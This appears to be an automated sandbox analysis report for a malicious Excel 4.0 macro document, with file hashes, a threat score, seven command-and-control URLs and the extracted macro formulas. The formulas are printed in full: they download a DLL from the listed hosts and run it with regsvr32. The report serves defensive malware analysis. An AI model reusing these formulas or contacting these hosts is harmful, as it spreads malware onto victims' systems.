General

  • Target

    ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

  • Size

    27KB

  • Sample

    240909-1ls5mstenb

  • MD5

    75b137eec11e92890485413127c2a34b

  • SHA1

    ee5ad0c8f90e359b3620990047fb1d50ce9654a8

  • SHA256

    ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

  • SHA512

    cce5d37bd796a09d9a15cdeb077795f03017d08dc7466beae68e291075bff2702740ea3a6403d1a5ae4efe4dd8414297d917ab481b2b0f8cce04a8c6ce7a6883

  • SSDEEP

    768:nCOv7JUnzEmD4ys2ewg4F32ByH3nFn1Kk8jI:CKdU4Y2JwZ/XFn4k8jI

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/

http://blog.centerking.top/wp-includes/DBq5jx/

http://polarrefrigeracao.com.br/fontes/y7QpO/

http://filmsetserie.dx.am/img/ghCY9J5KD1J/

https://vagbharati.in/wp-admin/nYBb/

http://advogadogoiania.com.br/wp-includes/O9Az4/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/6cc4ts0bkrOlXq/","..\rfs.dll",0,0)
    =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consejosdeorlando.com/wp-includes/jxTbRk2DgQOIOyokR/","..\rfs.dll",0,0))
    =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/DBq5jx/","..\rfs.dll",0,0))
    =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://polarrefrigeracao.com.br/fontes/y7QpO/","..\rfs.dll",0,0))
    =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://filmsetserie.dx.am/img/ghCY9J5KD1J/","..\rfs.dll",0,0))
    =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vagbharati.in/wp-admin/nYBb/","..\rfs.dll",0,0))
    =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://advogadogoiania.com.br/wp-includes/O9Az4/","..\rfs.dll",0,0))
    =IF('LFEVE'!F23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll")
    =RETURN()

Targets

    • Target

      ec4b51b3e432e37abd5b8ad9a09129cae18ca866104764ca7a84ff08acdbb088

    Score
    3/10
